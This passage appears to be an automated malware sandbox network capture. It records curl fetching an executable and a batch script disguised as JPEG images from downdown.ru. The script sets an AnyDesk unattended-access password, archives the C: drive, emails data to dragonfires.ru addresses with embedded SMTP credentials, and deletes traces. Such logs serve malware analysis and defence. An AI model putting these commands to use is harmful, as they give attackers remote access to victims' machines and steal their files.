                                                                                                                                                                  Data Ascii: $Action = New-ScheduledTaskAction -Execute "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"$Trigger = New-ScheduledTaskTrigger -Daily -At "01:00AM"$Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest# $TaskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -WakeToRun# Register-ScheduledTask -Action $Action -Principal $Principal -Trigger $Trigger -TaskName "WakeUpAndLaunchEdge" -Settings $TaskSettings -Force


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  5192.168.11.2049759185.125.51.5807956C:\Intel\curl.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 11, 2025 07:53:58.729125977 CET85OUTGET /dc.jpg HTTP/1.1
                                                                                                                                                                  User-Agent: curl/7.40.0-DEV
                                                                                                                                                                  Host: downdown.ru
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Jan 11, 2025 07:53:58.949945927 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:53:58 GMT
                                                                                                                                                                  Server: Apache/2
                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                  Last-Modified: Sun, 01 Dec 2024 14:22:40 GMT
                                                                                                                                                                  ETag: "cb190-628362a1aac00"
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Content-Length: 831888
                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2d 82 c1 ed 69 e3 af be 69 e3 af be 69 e3 af be d4 ac 39 be 6b e3 af be 60 9b 3a be 77 e3 af be 60 9b 2c be db e3 af be 60 9b 2b be 50 e3 af be 4e 25 c2 be 63 e3 af be 4e 25 d4 be 48 e3 af be 69 e3 ae be 64 e1 af be 60 9b 20 be 2f e3 af be 77 b1 3a be 6b e3 af be 77 b1 3b be 68 e3 af be 69 e3 38 be 68 e3 af be 60 9b 3e be 68 e3 af be 52 69 63 68 69 e3 af be 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 15 16 c8 4b 00 00 00 00 00 00 00 00 e0 00 23 01 0b 01 09 00 00 02 08 00 00 fa 02 00 00 00 00 00 10 63 01 00 00 10 00 00 00 20 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED]
                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-iii9k`:w`,`+PN%cN%Hid` /w:kw;hi8h`>hRichiPELK#c @p| @@<T @.text `.rdata\ @@.datah@.rsrcH@@ [TRUNCATED]
                                                                                                                                                                  Jan 11, 2025 07:53:58.949996948 CET1289INData Raw: 00 00 38 05 92 72 49 00 74 43 68 a4 03 00 00 50 8d 54 24 0c 52 a2 92 72 49 00 89 81 8c 01 00 00 e8 c5 21 01 00 a1 c0 72 49 00 83 c4 0c 8d 0c 24 51 6a 02 c7 44 24 08 a8 03 00 00 89 44 24 0c c7 44 24 10 01 00 00 00 ff 15 8c 24 48 00 81 c4 ac 03 00
                                                                                                                                                                  Data Ascii: 8rItChPT$RrI!rI$QjD$D$D$$HF$S3;JF,^$;J^,^0^4^8^[~jytNHFN3HFD$L$S\$W|$PQ_[UQV;
                                                                                                                                                                  Jan 11, 2025 07:53:58.950119972 CET1289INData Raw: 44 24 20 89 44 24 1c 89 44 24 28 89 44 24 60 89 44 24 64 88 44 24 68 88 44 24 69 89 44 24 54 89 44 24 58 88 44 24 5c 88 44 24 5d 89 44 24 48 89 44 24 4c 88 44 24 50 88 44 24 51 89 44 24 78 89 44 24 7c 88 84 24 80 00 00 00 88 84 24 81 00 00 00 89
                                                                                                                                                                  Data Ascii: D$ D$D$(D$`D$dD$hD$iD$TD$XD$\D$]D$HD$LD$PD$QD$xD$|$$D$<D$@D$DD$ED$lD$pD$tD$uD$;-JJEEJSp3D$4ftxAfuvIfu2tG
                                                                                                                                                                  Jan 11, 2025 07:53:58.950196028 CET1289INData Raw: 02 00 bf cc 7c 4a 00 8b c6 e8 3a 28 00 00 b0 01 5f c3 cc cc cc cc cc cc 83 7f 08 00 77 08 c7 47 08 00 00 00 00 c3 53 56 33 f6 8b 47 04 8b 1c b0 85 db 74 10 8b cb e8 cd 0b 00 00 53 e8 96 f8 00 00 83 c4 04 46 3b 77 08 72 e0 5e 5b c7 47 08 00 00 00
                                                                                                                                                                  Data Ascii: |J:(_wGSV3GtSF;wr^[G;P}Vr0@^;t%hHHD28rISUl$DVW3wHt$8D$(D$0\$4jL$,Q|J}'6=rIt$(w|$(wHt$8D$0
                                                                                                                                                                  Jan 11, 2025 07:53:58.950342894 CET1289INData Raw: 00 01 00 00 00 c7 84 24 3c 01 00 00 04 00 00 00 e8 34 13 01 00 8d 44 24 30 50 8d 8c 24 4c 01 00 00 33 d2 51 66 89 94 24 36 01 00 00 e8 3f f7 00 00 83 c4 20 8d 94 24 18 01 00 00 52 6a 01 ff 15 8c 24 48 00 8d 4c 24 08 e8 b2 06 00 00 5f 5e 8b e5 5d
                                                                                                                                                                  Data Ascii: $<4D$0P$L3Qf$6? $Rj$HL$_^]PSUVWt$<D$d3Pl$hh}JU#H}Jt$@|$(|J}JGHt$3MT$('t$(rGHt$D$0
                                                                                                                                                                  Jan 11, 2025 07:53:58.950460911 CET1289INData Raw: 68 e8 90 6e 00 00 8b 74 24 7c b8 01 00 00 00 89 44 24 70 89 44 24 68 8b 44 24 10 83 78 08 04 0f 84 14 d3 02 00 8b 5c 24 60 83 fb 04 0f 84 12 d3 02 00 8b 57 04 8b 84 24 84 00 00 00 8b 04 82 66 83 78 08 7f 0f 85 0d d3 02 00 33 f6 32 d2 eb 06 8d 9b
                                                                                                                                                                  Data Ascii: hnt$|D$pD$hD$x\$`W$fx32EHM;J@~<Jt1u-@fxuuIL$PL$(ND$xgt$mD$h\$D$ V
                                                                                                                                                                  Jan 11, 2025 07:53:58.950575113 CET1289INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc b8 28 20 00 00 e8 c6 28 02 00 53 55 56 8b d9 57 8d 7b 14 89 7c 24 1c e8 d4 f0 ff ff 8b 84 24 3c 20 00 00 33 ed 89 2b 83 c3 04 50 8b c3 e8 6e f8 ff ff 89 6c 24 14 c6 44 24 12 00 89 6c 24 18 c6 44 24 13 00 8b
                                                                                                                                                                  Data Ascii: ( (SUVW{|$$< 3+Pnl$D$l$D$Sf |f|5C;iL$fEf t9ft3f"tfDL0AL$f8"{|$tjD$|$t3|$0t
                                                                                                                                                                  Jan 11, 2025 07:53:58.950648069 CET1289INData Raw: 34 b9 85 f6 74 1b 0f b7 46 08 66 83 f8 3f 0f 8e dd 00 00 00 56 e8 99 e4 00 00 8b 44 24 40 83 c4 04 47 3b 78 08 72 d5 8b 54 24 3c 89 6a 08 66 39 2b 0f 84 fc 01 00 00 eb 0b 8d a4 24 00 00 00 00 8d 64 24 00 0f b7 04 6b 66 83 f8 20 0f 84 f7 00 00 00
                                                                                                                                                                  Data Ascii: 4tFf?VD$@G;xrT$<jf9+$d$kf fkfl$fl$f0f.fA*faf_ $=B(v)O"D&(4@$3@f
                                                                                                                                                                  Jan 11, 2025 07:53:58.950759888 CET1289INData Raw: 00 00 8d 74 24 14 e8 b0 f7 ff ff 8d 74 24 20 8d 7c 24 14 e8 f3 f2 ff ff 57 e9 e3 fc ff ff 66 83 fe 7a 0f 86 96 fd ff ff e9 67 fb ff ff bf 56 00 00 00 8d 74 24 14 45 e8 7f f7 ff ff 56 e9 bf fc ff ff bf 52 00 00 00 8d 74 24 14 45 e8 6a f7 ff ff 56
                                                                                                                                                                  Data Ascii: t$t$ |$WfzgVt$EVRt$EjVDkE=t$C>T$RzEf<k=t$BVmB1@1@2@1@g/@BI2@3@3@2@2@2@BEB
                                                                                                                                                                  Jan 11, 2025 07:53:58.950930119 CET1289INData Raw: 12 00 8d 4c 24 18 e8 c7 ed ff ff 80 7c 24 12 00 0f 85 3b 80 02 00 8d 8c 24 98 06 00 00 51 68 04 01 00 00 ff 15 38 23 48 00 8d 54 24 6c 52 8d 44 24 74 50 68 04 01 00 00 57 ff 15 20 23 48 00 8d 8c 24 a8 28 00 00 51 8d 94 24 b4 2a 00 00 52 8d 84 24
                                                                                                                                                                  Data Ascii: L$|$;$Qh8#HT$lRD$tPhW #H$(Q$*R$PL$pQ$RD$dP$Q$R$P$Q0#H3t$@f$bD$T3j\$ D$$jD$
                                                                                                                                                                  Jan 11, 2025 07:53:59.170708895 CET1289INData Raw: 08 74 22 8b 56 0c 8b 4e 04 8a 04 11 88 04 2f ff 46 0c 47 3b fb 72 e4 01 7e 10 8b c7 5f 83 56 14 00 5d c2 04 00 8b 56 04 8b 06 6a 00 8d 4c 24 10 51 68 00 00 01 00 52 50 ff 15 a0 21 48 00 8b 44 24 0c 85 c0 74 d1 89 46 08 c7 46 0c 00 00 00 00 eb b1
                                                                                                                                                                  Data Ascii: t"VN/FG;r~_V]VjL$QhRP!HD$tFFVFFFVVDWW3f>#;Wf>t;~f>ukW_^"t ':W;uW3f_^u3u


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  6192.168.11.204976457.129.37.157802596C:\Intel\AnyDesk\AnyDesk.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 11, 2025 07:54:12.789820910 CET274OUTData Raw: 16 03 01 01 0d 01 00 01 09 03 03 e0 a2 c5 36 1e d1 b5 26 80 50 92 9a 51 e7 64 e4 9b 4d 89 b5 17 eb 29 f6 9c 6f 79 cc 34 40 fe 71 00 00 6e c0 30 c0 2c c0 28 c0 24 c0 14 c0 0a 00 a5 00 a3 00 a1 00 9f 00 6b 00 6a 00 69 00 68 00 39 00 38 00 37 00 36
                                                                                                                                                                  Data Ascii: 6&PQdM)oy4@qn0,($kjih98762.*&=5/+'#g@?>32101-)%</r#
                                                                                                                                                                  Jan 11, 2025 07:54:13.019491911 CET536INData Raw: 16 03 03 00 57 02 00 00 53 03 03 d7 e5 93 66 ed f9 dd 0f d8 26 9f 2e 67 8c f1 19 6b 95 a7 1f 67 41 f4 a5 44 4f 57 4e 47 52 44 01 20 8e 10 fc f7 6e 4d 13 c7 18 b5 42 c2 89 0b 40 a0 0d b0 6f 8d b0 bb c5 44 59 94 e2 4e fa 4d 2e a0 c0 2c 00 00 0b ff
                                                                                                                                                                  Data Ascii: WSf&.gkgADOWNGRD nMB@oDYNM.,OKHE0A0)yA0*H0J10UAnyNet Root CA 21 0Uphilandro Software GmbH10UDE0190227210728Z2902242
                                                                                                                                                                  Jan 11, 2025 07:54:13.019522905 CET536INData Raw: a9 6d 85 e8 0b cc d8 b2 1c e2 f3 7a 23 29 07 f7 6b 05 dd 73 ad dd ec 74 a2 11 de fa fd c5 98 cb 98 cb 7e 1b 50 4e 3d 00 3c 89 26 14 86 06 19 5d 8f 63 3c dc be cc ad 1d 9f 54 c6 6f 8c 30 68 17 e3 c5 fb 4d 03 ec 5f 9f ce 1c 18 3a dd 43 e3 fe 3a d3
                                                                                                                                                                  Data Ascii: mz#)kst~PN=<&]c<To0hM_:C:~)"Z0y)@gW/Dl(dI5k25b~bj!z1LFSjAZgYZqQ|xu,9RusYP"XrWGvN4;5J#%US(ho-"
                                                                                                                                                                  Jan 11, 2025 07:54:13.019710064 CET164INData Raw: 24 6a a4 f9 ce 8c b4 06 ef a0 69 a7 cc 13 96 99 e5 83 ab 4e c5 c2 58 4b e4 3c 16 03 03 00 7c 0d 00 00 78 03 40 01 02 00 22 02 02 02 01 02 03 03 01 03 03 04 01 04 03 05 01 05 03 06 01 06 03 08 04 08 05 08 06 08 09 08 0a 08 0b 00 4e 00 4c 30 4a 31
                                                                                                                                                                  Data Ascii: $jiNXK<|x@"NL0J10UAnyNet Root CA 31 0Uphilandro Software GmbH10UDE
                                                                                                                                                                  Jan 11, 2025 07:54:13.026098967 CET1094OUTData Raw: 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 82 02 a8 30 82 01 90 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 19 31 17 30 15 06 03 55 04 03 0c 0e 41 6e 79 44 65 73 6b 20 43 6c 69 65 6e 74 30 20 17 0d 32 35 30 31 31 31 30 36 35 34
                                                                                                                                                                  Data Ascii: 000*H010UAnyDesk Client0 250111065409Z20741230065409Z010UAnyDesk Client0"0*H0"+ 0u&Nk;@{z|)4/*w<R
                                                                                                                                                                  Jan 11, 2025 07:54:13.255181074 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 dd a3 ca c5 6a 69 96 4b 9d 4f 64 81 23 44 3e 94 b7 f8 36 80 9e 25 e0 78 74 56 a1 61 7b ae dd e8 49 14 63 19 34 2b 10 92
                                                                                                                                                                  Data Ascii: (jiKOd#D>6%xtVa{Ic4+
                                                                                                                                                                  Jan 11, 2025 07:54:13.255377054 CET40INData Raw: 17 03 03 00 23 dd a3 ca c5 6a 69 96 4c ec fe 09 c6 83 8f 3b a4 33 80 ef 65 7a 81 c8 ba 32 6c 96 87 8a ca 25 dd 71 c9 68
                                                                                                                                                                  Data Ascii: #jiL;3ez2l%qh
                                                                                                                                                                  Jan 11, 2025 07:54:13.318856955 CET87OUTData Raw: 17 03 03 00 52 46 fd e6 00 d2 d5 9b aa 03 d2 2b c3 2f 40 32 90 ff e1 50 1f 34 db 09 4e 11 81 b3 16 ad fc c0 60 fb 75 98 08 94 c1 7f 04 f5 f1 9b 02 e4 85 c7 c7 bd 31 31 b5 b2 97 3e 25 22 ad 0d 72 12 10 03 43 87 bf 5b 3b c6 4e a6 75 c1 a2 9f 01 2d
                                                                                                                                                                  Data Ascii: RF+/@2P4N`u11>%"rC[;Nu-hD[
                                                                                                                                                                  Jan 11, 2025 07:54:13.601556063 CET197INData Raw: 17 03 03 00 c0 dd a3 ca c5 6a 69 96 4d e4 84 f1 63 10 60 a6 0b ce 6b 60 82 c5 b3 65 f7 d1 ca fa c6 cc 33 52 3e 86 ef 25 a8 c9 6b 1f de bf 5d 34 06 d9 5d 49 37 88 ec b4 92 5b e4 21 1e e7 3b 1a cd bc 18 91 22 cb 31 43 4f 7d a6 a0 09 9e e0 c0 74 4a
                                                                                                                                                                  Data Ascii: jiMc`k`e3R>%k]4]I7[!;"1CO}tJ\3^:9sCiQb*:#&Xb[C-TU%K,[f~[0[i=0IlhAnf8,^+G


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  7192.168.11.2049765185.125.51.5806064C:\Intel\curl.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 11, 2025 07:54:13.042390108 CET86OUTGET /bat.jpg HTTP/1.1
                                                                                                                                                                  User-Agent: curl/7.40.0-DEV
                                                                                                                                                                  Host: downdown.ru
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Jan 11, 2025 07:54:13.264702082 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:13 GMT
                                                                                                                                                                  Server: Apache/2
                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                  Last-Modified: Sun, 01 Dec 2024 14:59:54 GMT
                                                                                                                                                                  ETag: "117d-62836af42ce80"
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Content-Length: 4477
                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                  Data Raw: 65 63 68 6f 20 51 57 45 52 54 59 31 32 33 34 35 36 36 20 7c 20 41 6e 79 44 65 73 6b 2e 65 78 65 20 2d 2d 73 65 74 2d 70 61 73 73 77 6f 72 64 20 5f 75 6e 61 74 74 65 6e 64 65 64 5f 61 63 63 65 73 73 0d 0a 25 53 59 53 54 45 4d 44 52 49 56 45 25 5c 49 6e 74 65 6c 5c 64 63 2e 65 78 65 20 2f 44 0d 0a 70 6f 77 65 72 63 66 67 20 2d 73 65 74 61 63 76 61 6c 75 65 69 6e 64 65 78 20 53 43 48 45 4d 45 5f 43 55 52 52 45 4e 54 20 34 66 39 37 31 65 38 39 2d 65 65 62 64 2d 34 34 35 35 2d 61 38 64 65 2d 39 65 35 39 30 34 30 65 37 33 34 37 20 35 63 61 38 33 33 36 37 2d 36 65 34 35 2d 34 35 39 66 2d 61 32 37 62 2d 34 37 36 62 31 64 30 31 63 39 33 36 20 30 0d 0a 70 6f 77 65 72 63 66 67 20 2d 63 68 61 6e 67 65 20 2d 73 74 61 6e 64 62 79 2d 74 69 6d 65 6f 75 74 2d 61 63 20 30 0d 0a 70 6f 77 65 72 63 66 67 20 2d 63 68 61 6e 67 65 20 2d 68 69 62 65 72 6e 61 74 65 2d 74 69 6d 65 6f 75 74 2d 61 63 20 30 0d 0a 70 6f 77 65 72 63 66 67 20 2d 68 20 6f 66 66 0d 0a 70 6f 77 65 72 63 66 67 20 2f 53 45 54 44 43 56 41 4c 55 45 49 4e [TRUNCATED]
                                                                                                                                                                  Data Ascii: echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access%SYSTEMDRIVE%\Intel\dc.exe /Dpowercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0powercfg -change -standby-timeout-ac 0powercfg -change -hibernate-timeout-ac 0powercfg -h offpowercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00Powershell.exe -executionpolicy remotesigned -File %SYSTEMDRIVE%\Intel\AnyDesk\wol.ps1del /q %SYSTEMDRIVE%\Intel\curl.exedel /q %SYSTEMDRIVE%\Intel\Trays.rardel /q %SYSTEMDRIVE%\Intel\svchost.exeset mail-out=out@dragonfires.ruset pass-out=TyU005d94yset smtp=mail.dragonfires.ruset mail-in=in@dragonfires.ru%SYSTEMDRIVE%\Intel\driver.exe a -r -hplimpid2903392 % [TRUNCATED]
                                                                                                                                                                  Jan 11, 2025 07:54:13.264826059 CET1289INData Raw: 6c 6c 65 74 2e 72 61 72 20 20 43 3a 5c 2a af a0 e0 ae ab 2a 2e 2a 20 2f 79 0d 0a 25 53 59 53 54 45 4d 44 52 49 56 45 25 5c 49 6e 74 65 6c 5c 64 72 69 76 65 72 2e 65 78 65 20 61 20 2d 72 20 2d 68 70 6c 69 6d 70 69 64 32 39 30 33 33 39 32 20 25 53
                                                                                                                                                                  Data Ascii: llet.rar C:\**.* /y%SYSTEMDRIVE%\Intel\driver.exe a -r -hplimpid2903392 %SYSTEMDRIVE%\Intel\wallet.rar C:\**.* /y%SYSTEMDRIVE%\Intel\driver.exe a -r -hplimpid2903392 %SYSTEMDRIVE%\Intel\wallet.rar C:\**.* /y%SYSTEMDRIV
                                                                                                                                                                  Jan 11, 2025 07:54:13.264935970 CET1289INData Raw: 0d 0a 43 3a 5c 49 6e 74 65 6c 5c 62 6c 61 74 2e 65 78 65 20 2d 74 6f 20 25 6d 61 69 6c 2d 69 6e 25 20 2d 66 20 22 53 65 72 76 69 63 65 20 41 6e 69 64 65 73 6b 3c 25 6d 61 69 6c 2d 6f 75 74 25 3e 22 20 2d 73 65 72 76 65 72 20 25 73 6d 74 70 25 20
                                                                                                                                                                  Data Ascii: C:\Intel\blat.exe -to %mail-in% -f "Service Anidesk<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "AnyDesk %COMPUTERNAME%/%USERNAME%" -body "AnyDesk %COMPUTERNAME%/%USERNAME%" -attach "%PROGRAMDATA%\AnyDesk\se
                                                                                                                                                                  Jan 11, 2025 07:54:13.264967918 CET866INData Raw: 45 25 5c 49 6e 74 65 6c 5c 2a 2e 70 64 66 0d 0a 64 65 6c 20 2f 71 20 25 53 59 53 54 45 4d 44 52 49 56 45 25 5c 49 6e 74 65 6c 5c 2a 2e 64 6f 63 2a 0d 0a 64 65 6c 20 2f 71 20 25 53 59 53 54 45 4d 44 52 49 56 45 25 5c 49 6e 74 65 6c 5c 64 63 2e 65
                                                                                                                                                                  Data Ascii: E%\Intel\*.pdfdel /q %SYSTEMDRIVE%\Intel\*.doc*del /q %SYSTEMDRIVE%\Intel\dc.exedel /q %SYSTEMDRIVE%\Intel\AnyDesk\*.lnkdel /q %SYSTEMDRIVE%\Intel\AnyDesk\*.ps1del /q %SYSTEMDRIVE%\Intel\blat.exedel /q %SYSTEMDRIVE%\Intel\driver.ex


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  8192.168.11.2049767160.202.165.71802596C:\Intel\AnyDesk\AnyDesk.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 11, 2025 07:54:14.919289112 CET274OUTData Raw: 16 03 01 01 0d 01 00 01 09 03 03 c7 36 dc 44 62 b4 19 39 b6 a0 ed 06 0d d2 d1 6e a0 85 25 55 85 d7 79 c1 5e 1c e1 8e 2c f8 56 84 00 00 6e c0 30 c0 2c c0 28 c0 24 c0 14 c0 0a 00 a5 00 a3 00 a1 00 9f 00 6b 00 6a 00 69 00 68 00 39 00 38 00 37 00 36
                                                                                                                                                                  Data Ascii: 6Db9n%Uy^,Vn0,($kjih98762.*&=5/+'#g@?>32101-)%</r#
                                                                                                                                                                  Jan 11, 2025 07:54:15.039568901 CET1235INData Raw: 16 03 03 00 57 02 00 00 53 03 03 a2 e2 80 e3 b5 14 57 b6 00 6e 4e bf 6f 4e b7 6e 70 f6 ad 64 7b b9 84 cb 44 4f 57 4e 47 52 44 01 20 61 a1 ea 68 c3 fc 07 de 7f 0a 66 8f 86 a7 c7 8a a1 3d b2 e5 78 03 2b ea 31 a0 31 53 e3 ab af 22 c0 2c 00 00 0b ff
                                                                                                                                                                  Data Ascii: WSWnNoNnpd{DOWNGRD ahf=x+11S",OKHE0A0)yA0*H0J10UAnyNet Root CA 21 0Uphilandro Software GmbH10UDE0190227210728Z2902242
                                                                                                                                                                  Jan 11, 2025 07:54:15.046508074 CET1094OUTData Raw: 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 82 02 a8 30 82 01 90 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 19 31 17 30 15 06 03 55 04 03 0c 0e 41 6e 79 44 65 73 6b 20 43 6c 69 65 6e 74 30 20 17 0d 32 35 30 31 31 31 30 36 35 34
                                                                                                                                                                  Data Ascii: 000*H010UAnyDesk Client0 250111065409Z20741230065409Z010UAnyDesk Client0"0*H0"+ 0u&Nk;@{z|)4/*w<R
                                                                                                                                                                  Jan 11, 2025 07:54:15.165843964 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 88 c2 e3 d6 21 b2 63 bf c1 64 40 c0 c6 54 85 5d 49 ce d0 1c a4 79 23 75 a0 b7 de 2f 1b d8 77 a2 3b 5a b4 be 21 d1 4c 38
                                                                                                                                                                  Data Ascii: (!cd@T]Iy#u/w;Z!L8
                                                                                                                                                                  Jan 11, 2025 07:54:15.166032076 CET40INData Raw: 17 03 03 00 23 88 c2 e3 d6 21 b2 63 c0 9c 55 db a2 60 66 73 c2 46 d4 2b 9f 9d b7 9f 1d df 7e d4 1a a9 85 20 20 cf 00 30
                                                                                                                                                                  Data Ascii: #!cU`fsF+~ 0
                                                                                                                                                                  Jan 11, 2025 07:54:15.210036993 CET87OUTData Raw: 17 03 03 00 52 30 53 a3 29 35 37 ad 8b 3b 17 1c c3 60 b9 4a 7f 14 52 eb 38 57 f5 20 4f 87 95 f5 51 87 5f 4a f0 f6 1d 32 d3 26 32 f3 ee b9 f7 cb 79 26 08 e8 22 86 53 b7 1a 4b 15 1a 26 cd dd 85 15 4a cf b4 69 a8 5b 58 8c 3a 6e 81 86 d9 46 aa 4e 94
                                                                                                                                                                  Data Ascii: R0S)57;`JR8W OQ_J2&2y&"SK&Ji[X:nFN_p
                                                                                                                                                                  Jan 11, 2025 07:54:15.489640951 CET146INData Raw: 17 03 03 00 8d 88 c2 e3 d6 21 b2 63 c1 14 a3 6b 5f f6 15 62 7e 31 34 2f 20 63 09 4d 32 43 03 ef 09 ba 12 dc 69 17 a6 aa 22 5c c1 4e 66 7e 27 e7 f8 7a 5a 38 a7 82 ec ad 71 1d b9 66 01 0f 77 52 f7 13 98 e8 2f 13 50 26 5e 32 5c d1 85 6b c5 ad 9f 3a
                                                                                                                                                                  Data Ascii: !ck_b~14/ cM2Ci"\Nf~'zZ8qfwR/P&^2\k:1,|PoRL 1Oj2(@N
                                                                                                                                                                  Jan 11, 2025 07:54:15.783618927 CET681OUTData Raw: 17 03 03 02 a4 30 53 a3 29 35 37 ad 8c 77 e4 cd 92 fd 13 f6 5a d3 fd cf 3c d9 fc 9a 01 ec 69 a9 8c 2c ba bf 8b f5 77 80 73 e5 30 03 c1 c5 0a 6e 86 df c0 f7 15 65 97 2a f8 c5 ae 36 5c bb d1 43 f2 68 d2 d7 75 24 da 74 83 e2 5f d7 66 95 81 c5 6b 8e
                                                                                                                                                                  Data Ascii: 0S)57wZ<i,ws0ne*6\Chu$t_fk`x]s"lG~nSkq!l,Kr\V&=nJ7M_-$Dpt<?YxD*z\mIZZ'zp? 7+`H
                                                                                                                                                                  Jan 11, 2025 07:54:15.783618927 CET61OUTData Raw: 17 03 03 00 38 30 53 a3 29 35 37 ad 8d 29 b2 b2 5f 4a 69 b1 95 e6 b0 f2 69 58 f3 4d 32 d8 f2 02 7d 0d 85 47 3c 59 85 58 f0 5e 27 37 a3 56 8c e2 c0 f7 51 27 12 9e a8 73 6d 86 f6 61 18
                                                                                                                                                                  Data Ascii: 80S)57)_JiiXM2}G<YX^'7VQ'sma
                                                                                                                                                                  Jan 11, 2025 07:54:15.805115938 CET203OUTData Raw: 17 03 03 00 c6 30 53 a3 29 35 37 ad 8e 2f 51 c2 e9 a6 08 92 6c 38 b6 5a 08 0f d7 a4 24 4e 97 29 a0 ee 8c 23 04 35 3c fb 8e 2d ef 73 78 0f d6 5d 03 56 c4 15 5b 99 62 de b0 9d 9a da f3 8c 85 46 cd 79 4d c2 4b 5a 4a 82 1f b4 e0 0e c9 ab 50 0c f8 84
                                                                                                                                                                  Data Ascii: 0S)57/Ql8Z$N)#5<-sx]V[bFyMKZJP@ 9dj.tz}!FBU%hu7g.Xi)N=Bq(d>-&lskon{B"+3r\-/i#


                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  0192.168.11.2050906204.79.197.203443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:29 UTC763OUTGET /edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531&firstlaunch=1 HTTP/1.1
                                                                                                                                                                  Host: ntp.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:29 UTC8839INHTTP/1.1 200 OK
                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Length: 53433
                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                  Set-Cookie: _C_ETH=1; domain=.msn.com; path=/; secure; httponly
                                                                                                                                                                  Set-Cookie: _C_Auth=
                                                                                                                                                                  Set-Cookie: sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; expires=Mon, 11 Jan 2027 06:54:29 GMT; path=/
